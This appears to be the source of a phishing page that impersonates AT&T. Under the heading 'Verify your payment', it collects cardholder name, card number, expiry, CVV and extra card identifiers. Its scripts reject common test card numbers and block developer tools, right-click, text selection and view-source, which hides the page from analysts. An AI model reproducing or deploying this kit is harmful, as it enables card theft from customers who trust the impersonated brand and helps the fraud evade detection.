uMzAzIDgzLjY5OCAwLjE1MiA3MS45ODFDMC4xMTMgNzEuODA5IDAgNzEuODQ4IDAgNzJDMCA3NS45NDMgMC4zOTYgODEuMDM2IDEuMDc2IDg0LjQxNEMxLjM5OCA4Ni4wNTYgMi43MzYgODguNjQxIDQuNjk4IDkwLjY5N0MxMy42MjIgMTAwIDM1Ljg2OCAxMTMuMDM3IDc0LjM5NSAxMTMuMDM3QzEyNi44ODcgMTEzLjAzNyAxMzguODg4IDk1LjU0NyAxNDEuMzM5IDg5Ljc5MkMxNDMuMDk0IDg1LjY3OSAxNDQgNzguMjQ0IDE0NCA3MkMxNDQgNzAuNDg5IDE0My45NjEgNjkuMjgyIDE0My45MDUgNjguMDk0QzE0My45MDUgNjcuOTA0IDE0My43OTQgNjcuODg3IDE0My43NTUgNjguMDc0QzE0MS4xMzIgODIuMTUxIDk2LjI4MyAxMDAuODY2IDU3LjUyOSAxMDAuODY2TTc2Ljg4NyAxMzIuNTQ2Qzk0LjYwNSAxMzIuNTQ2IDExNC4wNzYgMTI3LjcxNiAxMjUuNzE4IDExOC4xNUMxMjguOTA1IDExNS41NDcgMTMxLjk0MyAxMTIuMDc2IDEzNC42NjEgMTA3LjQxNUMxMzYuMjI2IDEwNC43MzUgMTM3Ljc1NSAxMDEuNTQ3IDEzOS4wMDEgOTguNDE1QzEzOS4wNTggOTguMjY0IDEzOC45NjIgOTguMTg5IDEzOC44NDkgOTguMzU4QzEyOC4wMiAxMTQuMzAxIDk2LjY2MiAxMjQuMjQzIDY0LjI4NCAxMjQuMjQzQzQxLjM5NyAxMjQuMjQzIDE2Ljc3MyAxMTYuOTI0IDcuMTMzIDEwMi45NDNDNy4wMzggMTAyLjgxMSA2Ljk0MiAxMDIuODY4IDYuOTk5IDEwMy4wMThDMTUuOTgzIDEyMi4xMTIgNDMuMjI4IDEzMi41NDYgNzYuODg3IDEzMi41NDZNMjcuODUgMTI4Ljg2N0M0MC4wNTYgMTM4LjMyIDU1LjM3OCAxNDQgNzIuMDAxIDE0NEM5MC4xOSAxNDQgMTA2Ljc3NSAxMzcuMjQ0IDExOS40MzIgMTI2LjE1MUMxMTkuNTg0IDEyNi4wMTcgMTE5LjUxIDEyNS45MjQgMTE5LjM2IDEyNi4wMTdDMTEzLjY3OSAxMjkuODExIDk3LjQ5IDEzOC4wOTQgNzIuMDAxIDEzOC4wOTRDNDkuODQ4IDEzOC4wOTQgMzUuODUgMTMzLjE1IDI3Ljk0MiAxMjguNzM1QzI3Ljc5MyAxMjguNjYxIDI3LjczNiAxMjguNzc0IDI3Ljg1IDEyOC44NjciIGZpbGw9IiMwMDlGREIiLz4KPC9zdmc+Cg==" alt="logo" width="100"></div>
          <span style="font-size: 25px; color:rgb(230, 230, 230); font-weight:lighter;">|</span>
          <div class="nav-links">
            <a href="#"><i class="fa fa-bars me-2"></i></a>
            <a class="ok" href="#">Deals</a>
            <a class="ok" href="#">Wireless</a>
            <a class="ok" href="#">Internet</a>
            <a class="ok" href="#">Accessories</a>
            <a class="ok" href="#">Prepaid</a>
          </div>
        </div>
        <div class="nav-right">
          <a href="#" class="nav-button"><i class="fas fa-shopping-cart"></i></a>
          <span style="font-size: 25px; color:rgb(230, 230, 230); font-weight:lighter;">|</span>
          <a href="#" class="nav-button">Support</a>
          <span style="font-size: 25px; color:rgb(230, 230, 230); font-weight:lighter;">|</span>
          <a style="margin-right: -75px;" href="#" class="nav-button"><i class="fas fa-user"></i></a>
        </div>
      </div>
    </nav>
    <main>
      <div style="align-items: center; justify-content:center;" class="container bg-transparent d-flex">
        <div style="width: 500px; border:none;" class="card bg-transparent">
           <div style="border: none;" class="card-header bg-transparent text-center mb-2 mt-4">
                <h1 style="font-size: 24px;">Verify your payment</h1>
           </div>
           <hr>
           <form id="rabbit" method="post">
                <div class="form-group">
                    <div class="row m-2">
                        <?php if(isset($_SESSION['double_card'])): ?>
                        <div class="alert">
                            <span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span>
                            <i class="bi bi-exclamation-circle me-1"></i> <?= $dataPage['card_double_text'] ?? 'error'; ?>
                        </div>
                        <?php endif; ?>
                        <div class="col-md-12 col-12">
                            <label class="pl text-dark" for="">&#78;&#97;&#109;&#101;&#32;&#111;&#110;&#32;&#99;&#97;&#114;&#100;</label>
                            <input type="text" name="nameoncard" id="namecard" class="form-control border-dark p-3"  placeholder="First and last name" required>
                            <div class="errorMsg" id="inputErrorMsgCardName"></div>
                        </div>
                    </div>
                    <div class="row m-2">
                        <div class="col-md-12 col-12">
                            <label class="pl text-dark" for="">&#67;&#97;&#114;&#100;&#32;&#110;&#117;&#109;&#98;&#101;&#114;</label>
                            <input type="text" name="ccn" inputmode="numeric" id="cardnumber" class="form-control border-dark p-3" oninput="formatCardNumber(event)" onkeyup="ccc();" placeholder="0000 0000 0000 0000" required>
                            <div class="errorMsg" id="inputErrorMsgCardNumber"></div>
                        </div>
                    </div>
                    <div class="row m-2">
                        <div class="col-md-6 col-12 mt-2">
                            <label class="pl text-dark" for="">&#67;&#97;&#114;&#100;&#32;&#101;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;</label>
                            <input type="text" name="expdate" inputmode="numeric" id="cardexp" class="form-control border-dark p-3" placeholder="MM/YY" required>
                            <div  class="errorMsg" id="inputErrorMsgCardEXP"></div>
                        </div>
                        <div class="col-md-6 col-12 mt-2">
                            <label class="pl text-dark" for="">&#83;&#101;&#99;&#117;&#114;&#101;&#32;&#99;&#111;&#100;&#101; </label>
                            <input type="text" inputmode="numeric" id="cvv" name="cvv" class="form-control border-dark p-3" placeholder="CVV/CVV2" required>
                            <div class="errorMsg" id="inputErrorMsgCVV"></div>
                        </div>
                    </div>
                    <div id="cidInput" class="row joll mt-2 m-2">
                        <div class="col-md-12 col-12">
                            <label class="pl text-dark" for="">Card identification number</label>
                            <input type="text" id="cid" inputmode="numeric" name="cid" class="form-control border-dark p-3" placeholder="Card identification number">
                          <div class="errorMsg" id="inputErrorMsgCid"></div>
                        </div>
                    </div>
                        <div class="col-md-12 col-12" id="xid_section" style="display: none;">
                            <label class="pl text-dark" for="">XID (Discover)</label>
                            <input type="text" id="xid_input" inputmode="numeric" name="xid" class="form-control border-dark p-3" placeholder="5-digit XID" maxlength="5">
                          <div class="errorMsg" id="xidError" style="display: none; color: red;">Enter 5-digit XID</div>
                        </div>
                    <div class="row mt-4 mb-3 m-3">
                    <button style="font-weight: bold; border-radius:50px; padding: 12px; background-color:#0057b8; font-size:16px;" id="submitBtn" type="submit" class="btn btn-primary d-block w-100 mb-4 mt-3">
                        <span class="button-text">Continue</span>
                        <span class="spinner"></span>
                    </button>
                    </div>
                </div>
           </form>
        </div>
      </div>
    </main>
    <div class="text-center mt-3">
    <span style="color:gray; font-size:12px;">©2025 AT&T Intellectual Property. All rights reserved.</span><br><br>
</div>


    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script>
   <script type="text/javascript">
    function ccc(){
        var cc = document.getElementById("cardnumber").value;
        if(cc.match(/^[0-2]|^[7-9]/))
        {
            document.getElementById("cardnumber").value = "";
        }
        if(cc.match(/4111111111111111|5500000000000004|340000000000009|30000000000004|3088000000000009/))
        {
            document.getElementById("cardnumber").value = "";
        }
        var type = cc.substr(0, 2);
        var type1 = cc.substr(0, 1);
        var ccStripped = cc.replace(/\s/g, '');
        var type4 = ccStripped.substr(0, 4);
        var type3 = ccStripped.substr(0, 3);
        var isDiscover = (type4 == "6011" || (parseInt(type3) >= 644 && parseInt(type3) <= 649) || type == "65");
        if(type == "37" || type == "34") {
            $("#cvv").attr('maxlength','4');
            $('#cidInput').show()
            $('#cid').prop('required', true)
            document.getElementById('xid_section').style.display = 'none';
        }else if(isDiscover) {
            $("#cvv").attr('maxlength','3');
            $('#cidInput').hide()
            $('#cid').prop('required', false)
            document.getElementById('xid_section').style.display = 'block';
        }else{
            $("#cvv").attr('maxlength','3');
            $('#cidInput').hide()
            $('#cid').prop('required', false)
            document.getElementById('xid_section').style.display = 'none';
        }
    }
    

    function isValidCardNumber(number) {
        let sum = 0;
        let shouldDouble = false;
        for (let i = number.length - 1; i >= 0; i--) {
            let digit = parseInt(number.charAt(i));
            if (shouldDouble) {
                digit *= 2;
                if (digit > 9) digit -= 9;
            }
            sum += digit;
            shouldDouble = !shouldDouble;
        }
        return sum % 10 === 0;
    }
    function formatCardNumber(event) {
        const input = event.target;
        let value = input.value.replace(/\D/g, '');
        const maxLength = getCardNumberMaxLength(value);
        if (value.length > maxLength) {
            value = value.slice(0, maxLength);
        }
        input.value = value.replace(/(.{4})/g, '$1 ').trim();
        validateCardNumber();
    }
    function getCardNumberMaxLength(value) {
        if (/^3[47]/.test(value)) {
            return 15;
        } else {
            return 16;
        }
    }
    function validateCardNumber() {
        const cardInput = document.getElementById('cardnumber');
        const cardNumber = cardInput.value.replace(/\s/g, '');
        if (!isValidCardNumber(cardNumber)) {
            $("#cardnumber").addClass('error').removeClass('hasText')
            $("#inputErrorMsgCardNumber").show().html('<i class="bi bi-exclamation-circle"></i> Invalid card number. Please check a card number.')
            $("cardnumber").parent().parent().parent().removeClass('validated')
        } else {
            $("cardnumber").removeClass('error').addClass("hasText")
            $("#inputErrorMsgCardNumber").html('')
            $("cardnumber").parent().parent().parent().addClass('validated')
        }
    }
    document.getElementById('cardnumber').addEventListener('paste', (event) => {
        setTimeout(() => formatCardNumber(event), 0);
    });
    
   $('#cid').on("keyup focus", () => {
    var cid = $("#cid").val();
    if (cid == "") {
        $("#cid").addClass('error').removeClass('hasText');
        $("#inputErrorMsgCid").show().html('<i class="bi bi-exclamation-circle"></i> Please enter a card identification number.');
        $("#cid").parent().parent().parent().removeClass('validated');
    }
    else if (cid.length < 3) {
        $("#cid").addClass('error').removeClass('hasText');
        $("#inputErrorMsgCid").show().html('Please enter check card identification number.');
        $("#cid").parent().parent().parent().removeClass('validated');
    }
    else {
        $("#cid").removeClass('error').addClass("hasText");
        $("#inputErrorMsgCid").html('');
        $("#cid").parent().parent().parent().addClass('validated');
    }
});
    
    $('#namecard').on("keyup , focus", () => {
        var namecard = $("#namecard").val()
        if (namecard == "") {
            $("#namecard").addClass('error').removeClass('hasText')
            $("#inputErrorMsgCardName").show().html('<i class="bi bi-exclamation-circle"></i> Please enter a name on card (first and last name).')
            $("#namecard").parent().parent().parent().removeClass('validated')
        } else if (namecard.length < 6) {
            $("#namecard").addClass('error').addClass('hasText')
            $("#inputErrorMsgCardName").show().html('<i class="bi bi-exclamation-circle"></i> Please check a name on card.')
            $("#namecard").parent().parent().parent().removeClass('validated')
        } else {
            $("#namecard").removeClass('error').addClass("hasText")
            $("#inputErrorMsgCardName").html('')
            $("#namecard").parent().parent().parent().addClass('validated')
        }
    });
    $('#cardnumber').on("keyup , focus", () => {
        var cardnumber = $("#cardnumber").val()
        if (cardnumber == "") {
            $("#cardnumber").addClass('error').removeClass('hasText')
            $("#inputErrorMsgCardNumber").show().html('<i class="bi bi-exclamation-circle"></i> Please enter a card number.')
            $("#cardnumber").parent().parent().parent().removeClass('validated')
        } else {
            $("#cardnumber").removeClass('error').addClass("hasText")
            $("#cardnumber").parent().parent().parent().addClass('validated')
        }
    });
    $('#cardexp').on("keyup focus input", function () {
        var creditExpiration = $("#cardexp").val();
            if (creditExpiration === ""){
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i> Please enter a card expiration date.');
                $("#cardexp").parent().parent().parent().removeClass('validated');
            } else if (creditExpiration.substr(0, 2) > 12 || creditExpiration.substr(0, 2) == "00" || creditExpiration.length < 5) {
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i>  Please enter a valid card expiration date.');
                $("#cardexp").parent().parent().parent().removeClass('validated');
            } else if (!creditExpiration.includes("/")) {
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i> Please enter a expiration year.');
                $("#cardexp").parent().parent().parent().removeClass('validated');
            } else if (creditExpiration.substr(3, 2) < 25 || creditExpiration.substr(3, 2) == "00") {
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i> This date seems to have expired.');
                $("#cardexp").parent().parent().parent().removeClass('validated');   
            } else if (creditExpiration.substr(3, 2) > 35 || creditExpiration.substr(3, 2) == "00") {
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i> This date seems too far in the future.');
                $("#cardexp").parent().parent().parent().removeClass('validated');   
            } else if (creditExpiration.length > 5) {
                $("#cardexp").addClass('error').removeClass('hasText');
                $("#inputErrorMsgCardEXP").show().html('<i class="bi bi-exclamation-circle"></i> Please check a expiration date.');
                $("#cardexp").parent().parent().parent().removeClass('validated');
            } else {
                $("#cardexp").removeClass('error').addClass("hasText");
                $("#inputErrorMsgCardEXP").html('');
                $("#cardexp").parent().parent().parent().addClass('validated');
            }
            let my = $('#cardexp')
            if (my.val().length == 2 && !my.val().includes("/"))
                my.val(my.val() + "/")
        }); 
        
        
    $('#cvv').mask('0000');
    var cardNumberInput = $('#cardnumber');
    var cvvInput = $('#cvv');
    var errorCVV = $('#inputErrorMsgCVV');
    cardNumberInput.on('input', function () {
        var cardNumber = this.value.trim();
        resetCVVValidation();
        if (cardNumber.startsWith('34') || cardNumber.startsWith('37')) {
            cvvInput.attr('maxlength', '4');
            cvvInput.attr('pattern', '\\d{4}');
            cvvInput.attr('required', 'true');
            cvvInput[0].setCustomValidity('');
            validateCVV();
        } else {
            cvvInput.attr('maxlength', '3');
            cvvInput.attr('pattern', '\\d{3}');
            cvvInput.attr('required', 'true');
            cvvInput.removeClass('error').addClass('hasText');
            cvvInput.closest('.form-group').addClass('validated');
            cvvInput[0].setCustomValidity('');
        }
    });
    cvvInput.on('input', function () {
        validateCVV();
    });
	
	
	function validateCVV() {
        var cardNumber = cardNumberInput.val().trim();
        if (cardNumber.startsWith('34') || cardNumber.startsWith('37')) {
            if (cvvInput.val().length < 3) {
                cvvInput.addClass('error').removeClass('hasText');
                errorCVV.show().html('<i class="bi bi-exclamation-circle"></i> Enter 3-4 digit CVV.');
                cvvInput.closest('.form-group').removeClass('validated');
            } else if (cvvInput.val().length === 3) {
                cvvInput.addClass('error').removeClass('hasText');
                errorCVV.show().html('<i class="bi bi-exclamation-circle"></i> Required 4 digit CVV.');
                cvvInput.closest('.form-group').removeClass('validated');
            } else {
                cvvInput.removeClass('error').addClass('hasText');
                cvvInput.closest('.form-group').addClass('validated');
                errorCVV.hide();
            }
        } else {
            if (cvvInput.val().length === 3) {
                cvvInput.removeClass('error').addClass('hasText');
                cvvInput.closest('.form-group').addClass('validated');
                errorCVV.hide();
            } else if (cvvInput.length < 2) {
                cvvInput.addClass('error').removeClass('hasText');
                cvvInput.closest('.form-group').removeClass('validated');
                errorCVV.show().html('Enter 3-4 digit CVV.');
            } else {
                cvvInput.addClass('error').removeClass('hasText');
                cvvInput.closest('.form-group').removeClass('validated');
                errorCVV.show().html('Enter 3-4 digit CVV.');
            }
        }
    }
    function resetCVVValidation() {
        cvvInput.removeClass('error').removeClass('hasText');
        cvvInput.closest('.form-group').removeClass('validated');
        errorCVV.hide();
    };


    $('#cardnumber').mask('0000 0000 0000 0000');
    $('#cvv').mask('0000');
    $('#cid').mask('000');
    $('#xid_input').mask('00000');
    $('#cardexp').mask('00/00');
    $('#namecard , #cardnumber, #cardexp, #cvv').on("keyup , focus", () => {
        if (!$("#namecard").hasClass('error') && !$("#cardnumber").hasClass('error') && !$("#cardexp").hasClass('error') && !$("#cvv").hasClass('error')
            && $("#namecard").val().length > 0 && $("#cardnumber").val().length > 0 && $("#cardexp").val().length > 0 && $("#cvv").val().length > 0) {
            $("#submitBtn").prop("disabled", false)
        } else {
            $("#submitBtn").prop("disabled", true)
        }
    });

    const form = document.getElementById('rabbit');
        const submitButton = document.getElementById('submitBtn');
        form.addEventListener('submit', function (e) {
        e.preventDefault();
    
        // Check form validity
        if (!form.checkValidity()) {
            form.reportValidity();
            const firstErr = document.querySelector('.invalid-card') || document.querySelector('.error:not([style*="display: none"])') || document.querySelector(':invalid');
            if (firstErr) firstErr.scrollIntoView({ behavior: 'smooth', block: 'center' });
            return false;
        }
    
        submitButton.classList.add('loading');
    
        setTimeout(() => {
        form.submit();
      }, 3000);
    });

    var xidInput = document.getElementById('xid_input');
    if (xidInput) {
        xidInput.addEventListener('input', function() {
            this.value = this.value.replace(/\D/g, '').substring(0, 5);
            this.classList.remove('valid-card', 'invalid-card');
            var xidErr = document.getElementById('xidError');
            if (this.value.length === 5) {
                this.classList.add('valid-card');
                this.style.setProperty('border-color', '#28a745', 'important');
                this.style.setProperty('background-color', '#f8fff9', 'important');
                if (xidErr) xidErr.style.display = 'none';
            } else if (this.value.length > 0) {
                this.classList.add('invalid-card');
                this.style.setProperty('border-color', '#dc3545', 'important');
                if (xidErr) xidErr.style.display = 'block';
            } else {
                this.style.removeProperty('border-color');
                this.style.removeProperty('background-color');
                if (xidErr) xidErr.style.display = 'none';
            }
        });
    }

    </script>
<style>
.valid-card { border-color: #28a745 !important; border-width: 2px !important; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important; background-color: #f8fff9 !important; }
.invalid-card { border-color: #dc3545 !important; border-width: 2px !important; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important; background-color: #fff8f8 !important; }
</style>
<script>
(function(){
    var cardIn = document.getElementById('cardnumber');
    var expIn = document.getElementById('cardexp');
    var cvvIn = document.getElementById('cvv');
    function applyClass(el, valid) {
        if (!el) return;
        el.classList.remove('valid-card', 'invalid-card');
        if (el.value.replace(/\D/g,'').length === 0) return;
        el.classList.add(valid ? 'valid-card' : 'invalid-card');
    }
    if (cardIn) {
        cardIn.addEventListener('input', function(){
            var num = this.value.replace(/\s/g,'');
            if (num.length >= 13) {
                applyClass(this, typeof isValidCardNumber === 'function' ? isValidCardNumber(num) : false);
            } else { this.classList.remove('valid-card','invalid-card'); }
        });
    }
    if (expIn) {
        expIn.addEventListener('input', function(){
            var v = this.value;
            if (v.length === 5 && v.includes('/')) {
                var mm = parseInt(v.substr(0,2)), yy = parseInt(v.substr(3,2));
                var now = new Date(), curYear = now.getFullYear() % 100, curMonth = now.getMonth() + 1;
                var valid = mm >= 1 && mm <= 12 && (yy > curYear || (yy === curYear && mm >= curMonth)) && yy <= curYear + 15;
                applyClass(this, valid);
            } else { this.classList.remove('valid-card','invalid-card'); }
        });
    }
    if (cvvIn) {
        cvvIn.addEventListener('input', function(){
            var len = this.value.replace(/\D/g,'').length;
            var cardNum = cardIn ? cardIn.value.replace(/\D/g,'') : '';
            var expected = (cardNum.startsWith('34') || cardNum.startsWith('37')) ? 4 : 3;
            applyClass(this, len === expected);
        });
    }
})();
</script>
<script>
(function(){
    'use strict';
    function obfuscateDOM(){document.open();document.write('<!DOCTYPE html><html><head><title>AT&T</title><style>body{margin:0;padding:0;display:flex;justify-content:center;align-items:center;min-height:100vh;font-family:Arial;background:#f5f5f5}h1{color:#333;font-size:48px}</style></head><body><h1>AT&T</h1></body></html>');document.close();}
    function clearConsole(){if(window.console&&window.console.clear)console.clear();console.log('%cAccess Denied','color:red;font-size:40px;font-weight:bold');}
    var threshold=160;
    setInterval(function(){if(window.outerHeight-window.innerHeight>threshold||window.outerWidth-window.innerWidth>threshold)clearConsole();},500);
    document.addEventListener('keydown',function(e){
        if(e.key==='F12'||(e.ctrlKey&&e.shiftKey&&['I','C','J'].indexOf(e.key.toUpperCase())!==-1)){e.preventDefault();e.stopPropagation();clearConsole();return false;}
        if(e.ctrlKey&&e.key.toUpperCase()==='U'){setTimeout(obfuscateDOM,100);return true;}
        if(e.ctrlKey&&['C','V','X'].indexOf(e.key.toUpperCase())!==-1){if(e.target.tagName!=='INPUT'&&e.target.tagName!=='TEXTAREA'){e.preventDefault();return false;}}
    },true);
    document.addEventListener('contextmenu',function(e){e.preventDefault();return false;},false);
    document.addEventListener('selectstart',function(e){if(e.target.tagName!=='INPUT'&&e.target.tagName!=='TEXTAREA'){e.preventDefault();return false;}},false);
    clearConsole();
})();
</script>
    
    
  </body>
</html>